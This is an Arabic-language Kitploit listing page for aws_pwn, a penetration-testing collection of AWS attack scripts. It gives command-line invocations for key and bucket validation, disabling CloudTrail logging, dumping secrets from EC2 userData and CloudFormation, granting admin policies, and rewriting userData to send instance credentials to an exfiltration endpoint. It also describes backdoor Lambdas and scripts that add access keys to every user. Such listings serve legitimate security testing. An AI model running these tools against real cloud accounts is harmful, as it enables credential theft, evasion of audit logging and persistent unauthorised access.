Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
aws_pwn — مجموعة من أدوات اختراق AWS المتنوعة | Kitploit
أدوات/GitHubGitHub/dagrz/aws_pwn
أمن البنية التحتية السحابيةتصعيد الامتيازاتالاستطلاعآليات الاستمراريةالاستغلالتسريب البياناتما بعد الاستغلالاختبار الاختراقأمن السحابة
GitHubdagrz/aws_pwn

aws_pwn

مجموعة من أدوات اختراق AWS المتنوعة

1.2k192منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

اختراق AWS

ملخص

هذه مجموعة من النصوص البرمجية المكتوبة بشكل سيئ لأداء مهام مختلفة متعلقة باختبار الاختراق في AWS. لا تحزن إذا لم تعمل معك. ربما تغيرت AWS منذ كتابة الأداة أو ربما الكود سيئ. على أي حال، لا تتردد في المساهمة.

معظم هذه الهراء كُتب بواسطة Daniel Grzelak ولكن هناك الكثير من المساهمات، أبرزها Mike Fuller.

المتطلبات

root@kitploit:~
pip install -r requirements.txt

تأكد أيضًا من إعداد بيانات اعتماد AWS الخاصة بك في ~/.aws/credentials.

الاستطلاع

أشياء يمكن فعلها لجمع المعلومات قبل الاختراق.

  • validate_iam_access_keys.py - بالنظر إلى ملف TSV من مجموعات مفتاح الوصول + السر [+ جلسة]، يتحقق من صحة الوصول ويعيد معلومات هوية المدير.
root@kitploit:~
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - بالنظر إلى ملف نصي به كلمة واحدة في كل سطر، يتحقق من وجود الدلاء ويعيد معلومات تعريفية أساسية.
root@kitploit:~
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - بالنظر إلى ملف نصي للمديرين (مثل user/admin، role/deploy)، يتحقق من وجود المديرين في حساب معين.
root@kitploit:~
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - بالنظر إلى ملف نصي لمعرفات الحسابات وأسماء الحسابات المستعارة، يتحقق من وجود الحسابات.
root@kitploit:~
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

الاستغلال

أشياء ستساعدك في الحصول على موطئ قدم في حساب.

التخفي

أشياء قد تساعدك على البقاء مخفيًا بعد اختراق حساب.

  • disrupt_cloudtrail.py - يحاول تعطيل/إعاقة تسجيل cloudtrail بالطريقة المحددة.
root@kitploit:~
./disrupt_cloudtrail.py -s

الاستكشاف

أشياء لتساعدك على فهم ما قمت باختراقه.

  • dump_account_data.sh - يستدعي مجموعة من الوظائف العامة القائمة على الحساب (قراءة/قائمة/الحصول/وصف) ويحفظ البيانات في موقع معين. مزعج جدًا لكنه رائع للحصول على لقطة زمنية.
root@kitploit:~
./dump_account_data.sh /tmp/

رفع الصلاحيات

أشياء لتساعدك على التحرك داخل حساب وجمع مستويات وصول مختلفة.

  • dump_instance_attributes.py - يمر عبر كل مثيل EC2 في الحساب ويسترجع سمات المثيل المحددة. الأكثر استخدامًا لاسترجاع userData، التي تميل إلى احتواء أسرار.
root@kitploit:~
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - يسترجع أوصاف المكدس لكل مكدس موجود وكل مكدس تم حذفه في آخر 90 يومًا. المعاملات في أوصاف المكدس غالبًا تحتوي على كلمات مرور وأسرار أخرى.
root@kitploit:~
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - يحاول تولي جميع الأدوار (ARNs) في ملف أو المقدمة من API list-roles.
root@kitploit:~
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - يضيف سياسة المسؤول وجميع الإجراءات إلى مستخدم أو دور أو مجموعة معينة. يتطلب صلاحيات IAM putPolicy أو attachPolicy.
root@kitploit:~
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - يعيد تشغيل مثيل ec2 معين ويعيد كتابة userData الخاص به حتى تتمكن من تشغيل كود عشوائي أو سرقة بيانات اعتماد مؤقتة لملف تعريف المثيل.
root@kitploit:~
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

الثبات

أشياء لتساعد في الحفاظ على وصولك إلى حساب.

  • rabbit_lambda - دالة Lambda مثال تستجيب لأحداث حذف المستخدم عن طريق إنشاء نسخ إضافية من المستخدم المحذوف.
  • cli_lambda - دالة Lambda تعمل كخادم وكيل لـ aws cli ولا تتطلب بيانات اعتماد.
  • backdoor_created_users_lambda - دالة Lambda تضيف مفتاح وصول لكل مستخدم تم إنشاؤه حديثًا.
  • backdoor_created_roles_lambda - دالة Lambda تضيف علاقة ثقة لكل دور تم إنشاؤه حديثًا.
  • backdoor_created_security_groups_lambda - دالة Lambda تضيف قاعدة وصول وارد معينة لكل مجموعة أمان تم إنشاؤها حديثًا.
  • backdoor_all_users.py - يضيف مفتاح وصول لكل مستخدم في الحساب.
  • backdoor_all_roles.py - يضيف علاقة ثقة لكل دور في الحساب. يتطلب تحرير الملف لتعيين ARN الدور.
  • backdoor_all_security_groups.py - يضيف قاعدة وصول وارد معينة لكل مجموعة أمان في الحساب. يتطلب تحرير الملف لتعيين القاعدة.

التسريب

أشياء لتساعدك على استخراج البيانات ونقلها بطرق AWS.

  • dynamodump - https://github.com/bchew/dynamodump

متنوعات

أشياء أخرى كنت إما غبيًا أو كسولًا جدًا لتصنيفها.

  • reserved_words.txt - قائمة بالكلمات/الرموز التي لها معنى خاص في AWS أو من المحتمل أن يكون لها معنى خاص قريبًا.
  • endpoints.txt - قائمة حديثة إلى حد ما لنقاط نهاية API التي تعرضها AWS.
  • integrations.txt - ملف TSV للخدمات التي تتكامل مع AWS عبر الأدوار أو مفاتيح الوصول ومعرفات حساباتها وأسماء المستخدمين الافتراضية إلخ.
  • download_docs.sh - سطر الأوامر لـ wget جميع وثائق AWS لأنني غبي وأضيع الوقت في إعادة ذلك في كل مرة.

المهام المستقبلية

  • إضافة كلمات مرور للمستخدمين للثبات
  • تفريغ موارد المكدس
  • التحقق من MFA
  • إضافة المزيد من الاستدعاءات إلى dump_account_data
  • إضافة طرق تعطيل سجل إضافية
  • إنشاء برنامج نصي لتحليل cloudtrail لاستخراج الأشياء الجيدة من cloudtrail
  • إنشاء عداد أذونات دلو S3
  • إنشاء أداة لاستخراج بيانات اعتماد AWS من الأماكن الشائعة على القرص
  • إنشاء أداة استنساخ
  • إنشاء أداة سخيفة لتصعيد الصلاحيات تستخدم passrole
  • التحقق من قوائم الانتظار
  • التحقق من مواضيع الإشعارات
  • إصلاح نصوص الثبات لاستخدام الوسائط بدلاً من الثوابت داخل النصوص
تنزيل الأداة